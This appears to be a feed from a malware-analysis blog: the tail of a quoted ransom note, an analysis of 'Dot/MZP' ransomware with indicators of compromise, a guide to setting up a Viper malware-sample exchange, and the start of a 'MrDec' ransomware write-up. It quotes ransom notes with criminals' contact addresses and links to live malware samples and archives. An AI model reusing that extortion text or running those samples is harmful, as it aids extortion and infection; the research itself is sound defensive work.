<span class="k">If</span> <span class="nv">you</span> <span class="nv">don</span><span class="s1">'</span><span class="s">t want to pay the fee for bringing files back that</span><span class="s1">'</span><span class="nv">s</span> <span class="nv">okey</span>,
<span class="nv">but</span> <span class="nv">remeber</span> <span class="nv">that</span> <span class="nv">you</span> <span class="nv">will</span> <span class="nv">lose</span> <span class="nv">a</span> <span class="nv">lot</span> <span class="nv">of</span> <span class="nv">time</span> <span class="o">-</span> <span class="nv">and</span> <span class="nv">time</span> <span class="nv">is</span> <span class="nv">money</span>.
<span class="nv">Don</span><span class="s1">'</span><span class="s">t waste your time and money trying to recover files using some file</span>
<span class="nv">recovery</span> <span class="s2">"</span><span class="s">experts</span><span class="s2">"</span>, <span class="nv">we</span> <span class="nv">have</span> <span class="nv">your</span> <span class="nv">private</span> <span class="nv">key</span> <span class="o">-</span> <span class="nv">only</span> <span class="nv">we</span> <span class="nv">can</span> <span class="nv">get</span> <span class="nv">the</span> <span class="nv">files</span> <span class="nv">back</span>.
<span class="nv">With</span> <span class="nv">our</span> <span class="nv">service</span> <span class="nv">you</span> <span class="nv">can</span> <span class="nv">go</span> <span class="nv">back</span> <span class="nv">to</span> <span class="nv">original</span> <span class="nv">state</span> <span class="nv">in</span> <span class="nv">less</span> <span class="k">then</span> <span class="mi">30</span> <span class="nv">minutes</span>.
[<span class="o">+</span>] <span class="nv">Service</span> [<span class="o">+</span>]
<span class="k">If</span> <span class="nv">you</span> <span class="nv">decided</span> <span class="nv">to</span> <span class="nv">use</span> <span class="nv">our</span> <span class="nv">service</span> <span class="nv">please</span> <span class="nv">follow</span> <span class="nv">instructions</span> <span class="nv">below</span>.
<span class="nv">Contact</span> <span class="nv">us</span>:
<span class="nv">Install</span> <span class="nv">Telegram</span><span class="ss">(</span><span class="nv">available</span> <span class="k">for</span> <span class="nv">Windows</span>,<span class="nv">Android</span>,<span class="nv">iOS</span><span class="ss">)</span> <span class="nv">and</span> <span class="nv">contact</span> <span class="nv">us</span> <span class="nv">on</span> <span class="nv">chat</span>:
<span class="nv">Telegram</span> <span class="nv">contact</span>: <span class="nv">https</span>:<span class="o">//</span><span class="nv">t</span>.<span class="nv">me</span><span class="o">/</span><span class="nv">RecoverySupport</span>
<span class="nv">Also</span> <span class="nv">available</span> <span class="nv">at</span> <span class="nv">email</span> <span class="nv">afroditateam</span>@<span class="nv">tutanota</span>.<span class="nv">com</span> <span class="nv">cc</span>: <span class="nv">afroditasupport</span>@<span class="nv">mail2tor</span>.<span class="nv">com</span>
<span class="nv">Make</span> <span class="nv">sure</span> <span class="nv">you</span> <span class="nv">are</span> <span class="nv">talking</span> <span class="nv">with</span> <span class="nv">us</span> <span class="nv">and</span> <span class="nv">not</span> <span class="nv">impostor</span> <span class="nv">by</span> <span class="nv">requiring</span> <span class="nv">free</span> <span class="mi">1</span> <span class="nv">file</span> <span class="nv">decryption</span> <span class="nv">to</span> <span class="nv">make</span> <span class="nv">sure</span> <span class="nv">we</span> <span class="nv">CAN</span> <span class="nv">decrypt</span><span class="o">!!</span>
[<span class="nv">Removed</span> <span class="nv">victim</span> <span class="nv">ID</span> <span class="nv">because</span> <span class="nv">it</span> <span class="nv">breaks</span> <span class="nv">the</span> <span class="nv">RSS</span> <span class="nv">Feed</span> :<span class="nv">D</span>]
</pre></div>
<p></br></p>
<p>Title Image by <a href="https://de.m.wikipedia.org/wiki/Datei:Shrek_with_wife_-_Ogr%C3%B3d_bajek_w_Mi%C4%99dzyg%C3%B3rzu.jpg">Robert DrΓ³zd</a>, modified</p>"Nice decorating. Let me guess, Satan?" - Dot / MZP Ransomware2020-01-02T00:00:00+01:002020-01-02T00:00:00+01:00f0wLtag:dissectingmalwa.re,2020-01-02:/nice-decorating-let-me-guess-satan-dot-mzp-ransomware.html<p>Happy new year y'all. And with it there's new Ransomware to analyze, so come along for the ride :D</p><p><center><img alt="Dot Header" height="380px" width ="365px" src="https://dissectingmalwa.re/img/dot-logo.png"></center></p>
<p><br/></p>
<p>Dot "MZP" Ransomware @ <a href="https://app.any.run/tasks/56248422-b327-4226-8a79-3155e24b999d/">AnyRun</a> | <a href="https://www.virustotal.com/gui/file/bebf5c12e35029e21c9cca1da53eb43e893f9521435a246ea991bcced2fabe67/detection">VirusTotal</a> | <a href="https://www.hybrid-analysis.com/sample/bebf5c12e35029e21c9cca1da53eb43e893f9521435a246ea991bcced2fabe67?environmentId=100">HybridAnalysis</a>
--> <code>sha256 bebf5c12e35029e21c9cca1da53eb43e893f9521435a246ea991bcced2fabe67</code></p>
<p>This sample was first discovered by AmigoA and AkhmendTaia on the 31st of December 2019. AV Detections and Ransomnote contents didn't seem to match any previously present strain. The Note is delivered via a <em>.txt</em> File with a strange numeric victim ID and only one contact email address. The extension appended to encrypted Files seems to be a random 8 character lowercase string.</p>
<p><br/></p>
<p><center><blockquote class="twitter-tweet"><p lang="en" dir="ltr">New <a href="https://twitter.com/hashtag/MZP?src=hash&ref_src=twsrc%5Etfw">#MZP</a> <a href="https://twitter.com/hashtag/Ransomware?src=hash&ref_src=twsrc%5Etfw">#Ransomware</a><a href="https://t.co/YCY8NXzJZw">https://t.co/YCY8NXzJZw</a><br>It seems nothing special, but early AV-detections is uninformative. <br>Thanks to <a href="https://twitter.com/AkhmedTaia?ref_src=twsrc%5Etfw">@AkhmedTaia</a> <a href="https://t.co/qS1YapH8jW">pic.twitter.com/qS1YapH8jW</a></p>— Amigo-A (@Amigo_A_) <a href="https://twitter.com/Amigo_A_/status/1212136864393637888?ref_src=twsrc%5Etfw">December 31, 2019</a></blockquote> <script async src="https://platform.twitter.com/widgets.js" charset="utf-8"></script></center></p>
<p><br/></p>
<p>Because of the "MZP" (4D 5A 50) Magic at the beginning of the executable file they dubbed the Malware "MZP" Ransomware. As I explained before with the MZRevenge/MaMo Ransomware the "P" after the MZ Magic String indicates that the binary was built with Borland Delphi and <em>P</em> stands for Pascal (the programming language).</p>
<p><center><img alt="File Icon" src="https://dissectingmalwa.re/img/dot-mzp.png"></center></p>
<p><br/></p>
<p>In my Opinion the Name "MZP Ransomware" is too generic to be useful for future reference, so I'd like to propose the name "Dot Ransomware" because of the File Icon found with the Malware Samples. It shows the character "Dot" from the Warner Bros Cartoon Series "Animaniacs" popular in the mid-1990s.</p>
<p><center><img alt="File Icon" src="https://dissectingmalwa.re/img/dot-icon.png"></center></p>
<p><br/></p>
<p>Two things to note about the Output of "Detect it easy" for this sample: </p>
<ol>
<li>
<p>It confirms that the Ransomware was built with Borland Delphi (Version 4).</p>
</li>
<li>
<p>This sample seems to be packed with UPX 3.91. Running <code>upx -d 01.exe</code> yields us the unpacked Version. The Hashsums can be found in the IOC Section down below</p>
</li>
</ol>
<p><center><img alt="Detect it easy" src="https://dissectingmalwa.re/img/dot-die.png"></center></p>
<p><br/></p>
<p>Let's try something new :D Up until now I pretty much neglected memory dump analysis as a whole, but since I attended the Workshop on Volatility at 36c3 I noticed what I'm missing out on. With <code>volatility -f IE9WIN7-20200102-171509.dmp --profile=Win7SP1x86_24000 pstree</code> we can dump the process tree at the time of the capture. We can see that 01.exe is running as a subprocess of explorer.exe.</p>
<p><center><img alt="IDR Strings" src="https://dissectingmalwa.re/img/dot-pstree.png"></center></p>
<p><br/></p>
<p>With the <em>privs</em> plugin Volatility can show which process privileges are present, enabled, and/or enabled by default. Below you can see a screencapture of the output for the Ransomware. The Plugins <em>cmdscan</em> and <em>consoles</em> sadly did not return any output for 01.exe.</p>
<p><center><img alt="IDR Strings" src="https://dissectingmalwa.re/img/dot-privs.png"></center></p>
<p><br/></p>
<p>Let's check out what IDR (<a href="https://github.com/crypto2011/IDR">Interactive Delphi Reconstructor</a>) can tell us about the binary. First off: Strings.</p>
<p><center><img alt="IDR Strings" src="https://dissectingmalwa.re/img/dot-strings.png"></center></p>
<p>The first String related to the Compiler tells us that the criminals likely used <em>HiASM</em> (an old russian IDE for Delphi Development) to build the Malware. The DLL mentioned below <em>comctl32.dll</em> is often targeted for UAC Bypasses. It also seems to track Mouse events to some extent this could either be used as an evasion mechanism or entropy collection (the first option is a lot more plausible). <strong>"HOW TO RESTORE ENCRYPTED FILES.txt"</strong> is the filename of the dropped ransomnote, although I'm not sure about the use of <strong>"DECRYPT FILES.txt"</strong> since this file was not present on any infected system (Speculation: Does is select one out of multiple Filenames to make tracking more difficult?). Lastly we have a filepath and a string that looks like the criminal dragged his face across the keyboard once.</p>
<p><br/></p>
<p>Alright, let's move along. Because Delphi is notoriously weird and difficult to disassemble/decompile it is time to try a new tool again. Today I will be using Ghidra with <em>Dhrake</em> developed by Jesko HΓΌttenhain. You can find the Git repository below and if you would like to know more about the inner workings of the two scripts you should definitely read his article about them <a href="https://blag.nullteilerfrei.de/2019/12/23/reverse-engineering-delphi-binaries-in-ghidra-with-dhrake/">here</a>.</p>
<p><strong>A short tl;dr</strong>: Dhrake is short for "Delphi hand rake" and tries to fix missing symbols and borked function signatures by matching to the symbols extracted through IDR beforehand. This will not only clean up the decompilation results in Ghidra but also automatically create structs and virtual method tables for you instead of doing it by hand (as if reversing Delphi wasn't already painfull enough). It's pretty cool, give it a try!</p>
<p><br/></p>
<p><center><div class="github-card" data-github="huettenhain/dhrake" data-width="400" data-height="" data-theme="default"></div>
<script src="//cdn.jsdelivr.net/github-cards/latest/widget.js"></script></center></p>
<p><br/></p>
<p>The first step to success (lol who am I kidding) is firing up Ghdira and loading the sample. Tell it to auto-analyze the file.</p>
<p><center><img alt="Ghidra Analysis" src="https://dissectingmalwa.re/img/dot-ghidra.png"></center></p>
<p><br/></p>
<p>Next we need to extract the <em>.IDC</em> Symbol file with the Help of IDR. For this it is sufficient to clone the Git Repo and paste the Knowledge Base files from the Dropbox linked at the end of the Readme into it. After that is done just run IDR.exe, import the binary and choose <em>IDC Generator</em> under <strong>Tools</strong>.</p>
<p><center><img alt="IDR Symbols" src="https://dissectingmalwa.re/img/dot-idc.png"></center></p>
<p><br/></p>
<p>After copying the two Dhrake scripts into your ghidra_scripts folder (e.g. ~/ghidra_scripts) you can refresh the list in the Script Manager once and switch to the Delphi Category. Run DhrakeInit and select the IDC file you created earlier.</p>
<p><center><img alt="Ghidra Script Manager DhrakeInit" src="https://dissectingmalwa.re/img/dot-load.png"></center></p>
<p><br/></p>
<p>Filtering for "VMT" in the Symbol Tree gives you all the Symbols relevant to Dhrake. Just click the Name in the Listing view once and run DhrakeParseClass (set the checkbox "In Tool" and press F8 to run). The Script will now automatically create the corresponding class and vtable struct.</p>
<p><center><img alt="Ghidra Classes" src="https://dissectingmalwa.re/img/dot-classes.png"></center></p>
<p><br/></p>
<p>So I guess we should continue with the analysis now :D As 90% of ransomware strains do "Dot" will read the Keyboard Layout as well. <em>GetKeyboardLayout(0)</em> returning 7 would be equivalent to a Japanese Keyboard Layout (wtf?). Passing 1 to GetKeyboardType will return the Subtype which is OEM specific, but will tell you how many function keys there are. Weird. Here's the <a href="https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-getkeyboardtype">Documentation</a>.</p>
<p><center><img alt="KB Detection" src="https://dissectingmalwa.re/img/dot-keyboard.png"></center></p>
<p><br/></p>
<p>Dot also queries the current cursor position on the screen and passes it on to another function. Haven't investigated further yet.</p>
<p><center><img alt="Cursor Position" src="https://dissectingmalwa.re/img/dot-cursor.png"></center></p>
<p><br/></p>
<p>Here we are again: weird DLLs that may or may not be a UAC Bypass. UACme mentions two Methods (#21 and #22) employing comctl32.dll. Unsure what to make of this at the moment.</p>
<p><center><img alt="DLL" src="https://dissectingmalwa.re/img/dot-dll.png"></center></p>
<p><br/></p>
<p>In one of the Szenarios I ran Regshot to see whether the Ransomware adds/modifies/deletes Registry Keys, but there weren't any changes that I can attribute to it. Dot tries to read <em>SOFTWARE\Borland\Delphi\RTL</em> FPUMaskValue.</p>
<p><center><img alt="Registry Keys" src="https://dissectingmalwa.re/img/dot-reg.png"></center></p>
<p>This is another work in progress article as I've come down with the "Congress Flu", so check back in a few days for an update. Probably the most important thing this "report" is still missing is a look at the crypto implementation. A look at the Imports reveals that it is not using the Windows Crypto API but rather a weird Delphi one. We'll see.</p>
<p><br/></p>
<h2><strong>MITRE ATT&CK</strong></h2>
<p><em>T1107</em> --> File Deletion --> Defense Evasion</p>
<p><em>T1045</em> --> Software Packing --> Defense Evasion</p>
<p><em>T1012</em> --> Query Registry --> Discovery</p>
<p><em>T1076</em> --> Remote Desktop Protocol --> Lateral Movement</p>
<p><br/></p>
<h2><em>IOCs</em></h2>
<h3>Dot Samples</h3>
<div class="highlight"><pre><span></span><span class="mi">01</span><span class="p">.</span><span class="n">exe</span> <span class="c1">--> SHA256: bebf5c12e35029e21c9cca1da53eb43e893f9521435a246ea991bcced2fabe67</span>
<span class="n">SSDEEP</span><span class="p">:</span> <span class="mi">768</span><span class="p">:</span><span class="n">Qa8bmv7hNAMbgYT6hQdPLC7TasOKS</span><span class="o">/</span><span class="mi">3</span><span class="n">U7fzd4tA9yenQ779Zo2lPnoCLnS9QtRbY</span><span class="p">:</span><span class="n">Ebmvs71</span><span class="o">+</span><span class="n">DKoKS</span><span class="o">/</span><span class="n">kjzdfrQty2lPnoqS9X</span>
<span class="mi">01</span><span class="p">.</span><span class="n">exe</span> <span class="c1">--> SHA256: aa85b2ec79bc646671d7280ba27f4ce97e8fabe93ab7c97d0fd18d05bab6df29</span>
<span class="n">SSDEEP</span><span class="p">:</span> <span class="mi">98304</span><span class="p">:</span><span class="n">mt</span><span class="o">+</span><span class="n">HWV4nwA</span><span class="o">+</span><span class="mi">8</span><span class="n">PgzCRfjMlFBiZhfcrQSav</span><span class="o">//</span><span class="n">dH768QyO4YXoftvFUmgaJml9iUybR</span><span class="p">:</span><span class="n">NddPgzC</span><span class="o">+</span><span class="n">lFkZhER6</span><span class="o">/</span><span class="n">t</span><span class="o">+</span><span class="n">Hyr4A9FUmVJm</span><span class="o">+</span>
<span class="n">unpacked</span><span class="p">:</span>
<span class="mi">01</span><span class="p">.</span><span class="n">exe</span> <span class="c1">--> SHA256: 814e061d2e58720a43bcb3fe0478a8088053f0a407e25ff84fb98850d128f81c</span>
<span class="n">SSDEEP</span><span class="p">:</span> <span class="mi">1536</span><span class="p">:</span><span class="n">CCq2EikJZdZ529nEaqQOyergddb6apjAwzHx4D</span><span class="p">:</span><span class="mi">7</span><span class="n">IZYxEHJrIdFjAwzHx4</span>
</pre></div>
<h3>Registry Changes</h3>
<p>Inconclusive as Regshot didn't show anything suspicious, only Delphi related Keys at most</p>
<h3>E-Mail Addresses</h3>
<div class="highlight"><pre><span></span><span class="n">recover_24_7</span><span class="nv">@protonmail</span><span class="o">[</span><span class="n">.</span><span class="o">]</span><span class="n">com</span><span class="w"></span>
</pre></div>
<h3>Ransomnote</h3>
<div class="highlight"><pre><span></span><span class="k">If</span> <span class="nv">you</span> <span class="nv">want</span> <span class="nv">to</span> <span class="k">return</span> <span class="nv">your</span> .[<span class="nv">REDACTED</span>: <span class="k">random</span> <span class="mi">8</span><span class="o">-</span><span class="nv">letter</span> <span class="nv">lowercase</span> <span class="nv">extension</span>] <span class="nv">files</span>, <span class="nv">contact</span> <span class="nv">us</span> <span class="nv">and</span> <span class="nv">we</span> <span class="nv">will</span> <span class="k">send</span> <span class="nv">you</span> <span class="nv">a</span> <span class="nv">decryptor</span> <span class="nv">and</span> <span class="nv">a</span> <span class="nv">unique</span> <span class="nv">decryption</span> <span class="nv">key</span>.
<span class="nv">recover_24_7</span>@<span class="nv">protonmail</span>[.]<span class="nv">com</span>
<span class="nv">All</span> <span class="nv">your</span> <span class="nv">files</span> <span class="nv">have</span> <span class="nv">been</span> <span class="nv">encrypted</span><span class="o">!</span>
<span class="nv">Your</span> <span class="nv">personal</span> <span class="nv">identifier</span>:
<span class="o">===========================================================================================</span>
<span class="o">-------------------------------------------------------------------------------------------</span>
[<span class="nv">REDACTED</span>: <span class="mi">606</span><span class="o">-</span><span class="nv">digit</span> <span class="nv">numeric</span> <span class="nv">ID</span>]
<span class="o">-------------------------------------------------------------------------------------------</span>
<span class="o">===========================================================================================</span>
</pre></div>
<p></br></p>Setting up a Malware Exchange for 36C3 with Viper2019-12-25T00:00:00+01:002019-12-25T00:00:00+01:00f0wLtag:dissectingmalwa.re,2019-12-25:/setting-up-a-malware-exchange-for-36c3-with-viper.html<p>Since my original project for 36c3 (something with chinese gear and coreboot) didn't really work out in time I had an even better idea: Setting up a Malware Sample Exchange</p><p>After checking the projects and self-organized Sessions I couldn't find anything related to Malware Research or a place to discuss reverse engineering (besides CTF maybe), so with the "Malware XCHG" I want to create a place for attendees to share malicious binaries and discuss them at the same time.</p>
<p>To host this project at the <a href="https://mysteryhack.space">MysteryHack</a> Assembly I wanted to use a small but capable enough machine which is why I used the Intel NUC NUC7I3BNH that I had lying around at the time. Of course the box has to be isolated from the congress network so everyone interested will have to plug in via Ethernet over a switch. At first I wanted to set up a Cuckoo Sandbox instance, but because of a lack of time and computing resources the <a href="https://viper.li/en/latest/">Viper Framework</a> became the tool of choice.</p>
<p><center><img alt="Title Picture" width="600px" height="350px" src="https://dissectingmalwa.re/img/xchg-title.jpg"></center></p>
<p><br/></p>
<p>Viper is available on Github:</p>
<p><center><div class="github-card" data-github="viper-framework/viper" data-width="400" data-height="" data-theme="default"></div>
<script src="//cdn.jsdelivr.net/github-cards/latest/widget.js"></script></center></p>
<p></br></p>
<p>The first thing we should do is install all the dependencies viper requires to run properly.</p>
<div class="highlight"><pre><span></span><span class="n">sudo</span> <span class="n">apt</span> <span class="n">install</span> <span class="n">git</span> <span class="n">build</span><span class="o">-</span><span class="n">essential</span> <span class="n">python3</span> <span class="n">python3</span><span class="o">-</span><span class="n">dev</span> <span class="n">python3</span><span class="o">-</span><span class="n">pip</span> <span class="n">exiftool</span> <span class="n">clamav</span><span class="o">-</span><span class="n">daemon</span> <span class="n">tor</span> <span class="n">libdpkg</span><span class="o">-</span><span class="n">perl</span> <span class="n">libssl</span><span class="o">-</span><span class="n">dev</span> <span class="n">swig</span> <span class="n">libffi</span><span class="o">-</span><span class="n">dev</span> <span class="n">ssdeep</span> <span class="n">libfuzzy</span><span class="o">-</span><span class="n">dev</span> <span class="n">unrar</span> <span class="n">p7zip</span><span class="o">-</span><span class="k">full</span>
</pre></div>
<p><br/></p>
<p>And because installing dependencies is fun let's install some more! This time we'll take care of the necessary Python modules.</p>
<p><code>sudo pip3 install olefile pdftools pypdns pydeep virustotal-api yara pefile scrapy</code></p>
<p><br/></p>
<p><center><img alt="Logo" width="300px" height="150px" src="https://dissectingmalwa.re/img/xchg-depend.jpg"></center></p>
<p><br/></p>
<p>And a custom module for the viper-framework:</p>
<p><code>sudo pip3 install git+https://github.com/sebdraven/verify-sigs.git</code></p>
<p><br/></p>
<p>After that is done we can finally install the viper-framework via pip:</p>
<p><code>sudo pip3 install viper-framework</code></p>
<p><br/></p>
<p>Running <code>viper</code> for the first time will create a folder called <strong>.viper</strong> in your home directory. This is were all the files, databases, notes etc. are saved.</p>
<p>And let's not forget the django Webinterface for viper:</p>
<div class="highlight"><pre><span></span><span class="n">cd</span> <span class="p">.</span><span class="n">viper</span>
<span class="n">git</span> <span class="n">clone</span> <span class="n">https</span><span class="p">:</span><span class="o">//</span><span class="n">github</span><span class="p">.</span><span class="n">com</span><span class="o">/</span><span class="n">jdsnape</span><span class="o">/</span><span class="n">viper</span><span class="o">-</span><span class="n">web</span><span class="p">.</span><span class="n">git</span>
<span class="n">cd</span> <span class="n">viper</span><span class="o">-</span><span class="n">web</span>
<span class="p">.</span><span class="o">/</span><span class="n">viper</span><span class="o">-</span><span class="n">web</span>
</pre></div>
<p>Of course viper-web has some dependencies as well: </p>
<p><code>sudo pip3 install -r requirements.txt</code></p>
<p><br/></p>
<p>Up we have to configure the Webinterface in <em>viper.conf</em> located in <em>.viper</em>: </p>
<p>Scroll down to the <em>[web]</em> section and define a user/password combo and the host + port settings. I chose Port 4434 and 0.0.0.0 as the host to make it reachable for connecting devices.</p>
<div class="highlight"><pre><span></span><span class="k">[web]</span>
<span class="na">host</span> <span class="o">=</span> <span class="s">0.0.0.0</span>
<span class="na">port</span> <span class="o">=</span> <span class="s">4434</span>
<span class="na">tls</span> <span class="o">=</span> <span class="s">False</span>
<span class="na">certificate</span> <span class="o">=</span>
<span class="na">key</span> <span class="o">=</span>
<span class="na">admin_username</span> <span class="o">=</span> <span class="s">ccc</span>
<span class="na">admin_password</span> <span class="o">=</span> <span class="s">malwarexchg</span>
</pre></div>
<p>Finally we can run <em>./viper-web</em> to start up viper and the django server.</p>
<p><center><img alt="Django Server" src="https://dissectingmalwa.re/img/xchg-server.png"></center></p>
<p><br/></p>
<p>One last step to get it operational: Setting up networking and iptables sorta correctly. (I locked myself out twice while writing this, so ideally you want to have physical access to the machince whilst installing this).</p>
<p>The following screenshot shows the netplan config I'm using.</p>
<p><center><img alt="Netplan config" src="https://dissectingmalwa.re/img/xchg-net.png"></center></p>
<p><br/></p>
<p>And here's a short exerpt from my iptables. (I'm using iptables-persistent)</p>
<div class="highlight"><pre><span></span><span class="k">Chain</span> <span class="k">INPUT</span> <span class="p">(</span><span class="n">policy</span> <span class="n">ACCEPT</span> <span class="mi">0</span> <span class="n">packets</span><span class="p">,</span> <span class="mi">0</span> <span class="n">bytes</span><span class="p">)</span>
<span class="n">pkts</span> <span class="n">bytes</span> <span class="n">target</span> <span class="n">prot</span> <span class="n">opt</span> <span class="k">in</span> <span class="k">out</span> <span class="k">source</span> <span class="n">destination</span>
<span class="mi">330</span> <span class="mi">24289</span> <span class="n">ACCEPT</span> <span class="n">tcp</span> <span class="c1">-- any any 192.168.42.0/24 anywhere tcp dpt:ssh</span>
<span class="mi">0</span> <span class="mi">0</span> <span class="n">ACCEPT</span> <span class="n">tcp</span> <span class="c1">-- any any localhost/8 anywhere tcp dpt:ssh</span>
<span class="mi">337</span> <span class="mi">35307</span> <span class="n">ACCEPT</span> <span class="n">tcp</span> <span class="c1">-- any any 192.168.42.0/24 anywhere tcp dpt:4434</span>
<span class="mi">0</span> <span class="mi">0</span> <span class="n">ACCEPT</span> <span class="n">tcp</span> <span class="c1">-- any any localhost/8 anywhere tcp dpt:4434</span>
<span class="mi">0</span> <span class="mi">0</span> <span class="n">ACCEPT</span> <span class="n">udp</span> <span class="c1">-- any any 192.168.42.0/24 anywhere udp dpt:4434</span>
<span class="mi">0</span> <span class="mi">0</span> <span class="n">ACCEPT</span> <span class="n">udp</span> <span class="c1">-- any any localhost/8 anywhere udp dpt:4434</span>
<span class="mi">552</span> <span class="mi">41468</span> <span class="n">ACCEPT</span> <span class="k">all</span> <span class="c1">-- lo any anywhere anywhere</span>
<span class="mi">0</span> <span class="mi">0</span> <span class="n">REJECT</span> <span class="k">all</span> <span class="c1">-- any any anywhere anywhere reject-with icmp-port-unreachable</span>
<span class="k">Chain</span> <span class="k">FORWARD</span> <span class="p">(</span><span class="n">policy</span> <span class="n">ACCEPT</span> <span class="mi">0</span> <span class="n">packets</span><span class="p">,</span> <span class="mi">0</span> <span class="n">bytes</span><span class="p">)</span>
<span class="n">pkts</span> <span class="n">bytes</span> <span class="n">target</span> <span class="n">prot</span> <span class="n">opt</span> <span class="k">in</span> <span class="k">out</span> <span class="k">source</span> <span class="n">destination</span>
<span class="k">Chain</span> <span class="k">OUTPUT</span> <span class="p">(</span><span class="n">policy</span> <span class="n">ACCEPT</span> <span class="mi">965</span> <span class="n">packets</span><span class="p">,</span> <span class="mi">602</span><span class="n">K</span> <span class="n">bytes</span><span class="p">)</span>
<span class="n">pkts</span> <span class="n">bytes</span> <span class="n">target</span> <span class="n">prot</span> <span class="n">opt</span> <span class="k">in</span> <span class="k">out</span> <span class="k">source</span> <span class="n">destination</span>
<span class="mi">0</span> <span class="mi">0</span> <span class="n">ACCEPT</span> <span class="n">tcp</span> <span class="c1">-- any any 192.168.42.0/24 anywhere tcp dpt:4434</span>
<span class="mi">0</span> <span class="mi">0</span> <span class="n">ACCEPT</span> <span class="n">udp</span> <span class="c1">-- any any 192.168.42.0/24 anywhere udp dpt:4434</span>
<span class="mi">0</span> <span class="mi">0</span> <span class="n">ACCEPT</span> <span class="n">tcp</span> <span class="c1">-- any any localhost/8 anywhere tcp dpt:4434</span>
<span class="mi">0</span> <span class="mi">0</span> <span class="n">ACCEPT</span> <span class="n">udp</span> <span class="c1">-- any any localhost/8 anywhere udp dpt:4434</span>
<span class="mi">0</span> <span class="mi">0</span> <span class="n">ACCEPT</span> <span class="n">tcp</span> <span class="c1">-- any any localhost/8 anywhere tcp dpt:ssh</span>
<span class="mi">0</span> <span class="mi">0</span> <span class="n">ACCEPT</span> <span class="n">tcp</span> <span class="c1">-- any any 192.168.42.0/24 anywhere tcp dpt:ssh</span>
<span class="mi">0</span> <span class="mi">0</span> <span class="n">REJECT</span> <span class="k">all</span> <span class="c1">-- any any anywhere anywhere reject-with icmp-port-unreachable</span>
</pre></div>
<p><br/></p>
<h2><strong>Update 27.12.2019:</strong></h2>
<p>Here is a photo of the Project at 36c3 in Leipzig</p>
<p><center><img alt="Setup at 36c3" src="https://dissectingmalwa.re/img/xchg-setup.jpg"></center></p>
<p><br/></p>
<h2><strong>Update 04.01.2020:</strong></h2>
<p>Thanks to everyone who shared samples at the Exchange and for the great conversations as well. See you all at 37c3 I guess :D</p>
<p>Here is a digest of all samples that were uploaded to the box by the end of Day 4:</p>
<p><br/></p>
<p>36c3-malwarexchg-part1.zip: <a href="https://malshare.com/sample.php?action=detail&hash=390dd9f3720d188d8e20271a0fbac7d3">> Malshare</a></p>
<p>36c3-malwarexchg-part2.zip: <a href="https://malshare.com/sample.php?action=detail&hash=412b9e9da6cfd920f725686136440acb">> Malshare</a></p>
<p>36c3-malwarexchg-part3.zip: <a href="https://malshare.com/sample.php?action=detail&hash=1447196091a1b5792811a694da2bdc65">> Malshare</a></p>
<p>FancyBear (archive to large for malshare): <a href="https://www.hybrid-analysis.com/sample/e8c66fb64dd016aaba6a5e87341b73d0ee5844311bf0524fa74f203b7864a67c">> Hybrid Analysis</a></p>
<p>CozyBear (archive to large for malshare): <a href="https://www.hybrid-analysis.com/sample/93644d338ddd66015d8787bb0477f37aa0e5ccc4642f819566a7c653fcc342a2">> Hybrid Analysis</a></p>I literally can't think of a fitting pun - MrDec Ransomware2019-12-23T00:00:00+01:002019-12-23T00:00:00+01:00f0wLtag:dissectingmalwa.re,2019-12-23:/i-literally-cant-think-of-a-fitting-pun-mrdec-ransomware.html<p>I took notice of the Ransomware Family after a series of posts in the Bleeping Computer Forum.</p><p>It employs techniques that are not seen very often in other ransomware samples, so the Analysis is actually quite difficult, but I'm hoping reading this is also a bit interesting atleast.</p>
<p><center><img alt="Logo" height="256px" width="256px" src="https://dissectingmalwa.re/img/mrdec-logo.png"></center></p>
<h2>Work in Progress</h2>
<p>Because Christmas and 36c3 is coming up in the next few I days I might have to push this analysis back a bit.</p>
<h4><em>A general disclaimer as always: downloading and running the samples linked below will lead to the encryption of your personal data, so be f$cking careful. Also check with your local laws as owning malware binaries/ sources might be illegal depending on where you live.</em></h4>
<p>MrDec @ <a href="https://app.any.run/tasks/f4677b72-5c32-4d65-8572-51365ebe8e32">AnyRun</a> | <a href="https://www.virustotal.com/gui/file/a700f9ced75c4143da6c4d1e09d6778e84ff570ea7d297fc130a0844e56c96ad/details">VirusTotal</a> | <a href="https://www.hybrid-analysis.com/sample/a700f9ced75c4143da6c4d1e09d6778e84ff570ea7d297fc130a0844e56c96ad?environmentId=120">HybridAnalysis</a>
--> <code>sha256 a700f9ced75c4143da6c4d1e09d6778e84ff570ea7d297fc130a0844e56c96ad</code></p>
<p></br></p>
<p>Let's see what we're dealing with here and fire up Detect it easy:</p>
<p><center><img alt="Detect it easy" src="https://dissectingmalwa.re/img/mrdec-die.png"></center></p>
<p><br/></p>
<p><center><img alt="Entropy Graph" src="https://dissectingmalwa.re/img/mrdec-entropy.png"></center></p>
<p><br/></p>
<p>The Ransomnote is delivered via a <em>.hta</em> file. Like most other strains active in the last few month the criminals use two E-Mail addresses: a "primary" and a "backup". In this case they are using Protonmail and AOL which has been kind of a pattern for them (Tutanota is their third preferred service, a list of previously used mailboxes is available down below in the IOCs Section).</p>
<p><center><img alt="Ransomnote in mshta/IE" src="https://dissectingmalwa.re/img/mrdec-ransomnote.png"></center></p>
<p><br/></p>
<p>Opening the note in another browser (Chrome in this case) won't show the instructions but a countdown timer. The victim won't be able to see the timer in most cases because when using Internet Explorer because scrolling is disabled :D</p>
<p><center><img alt="Ransomnote in Chrome" src="https://dissectingmalwa.re/img/mrdec-note2.png"></center></p>
<p><br/></p>
<p><center><img alt="Ransomnote in Chrome" src="https://dissectingmalwa.re/img/mrdec-notecode.png"></center></p>
<p><br/></p>
<p><center><img alt="x32dbg" src="https://dissectingmalwa.re/img/mrdec-x32dbg.png"></center></p>
<p><br/></p>
<p><center><img alt="Running it twice" src="https://dissectingmalwa.re/img/mrdec-2nd.png"></center></p>
<p><br/></p>
<p><center><img alt="Imports of the binary" src="https://dissectingmalwa.re/img/mrdec-imports.png"></center></p>
<p><br/></p>
<p><center><img alt="Imports of the binary" src="https://dissectingmalwa.re/img/mrdec-processgraph.png"></center></p>
<p><br/></p>
<p><center><img alt="Windows Crypto API" src="https://dissectingmalwa.re/img/mrdec-winapi.png"></center></p>
<p><br/></p>
<p><center><img alt="Windows Crypto API" src="https://dissectingmalwa.re/img/mrdec-winapi2.png"></center></p>
<p><br/></p>
<p><center><img alt="File Encryption Routine" src="https://dissectingmalwa.re/img/mrdec-cryptencrypt.png"></center></p>
<p><br/></p>
<p><center><img alt="Clearing the Memory" src="https://dissectingmalwa.re/img/mrdec-zeromem.png"></center></p>
<p><br/></p>
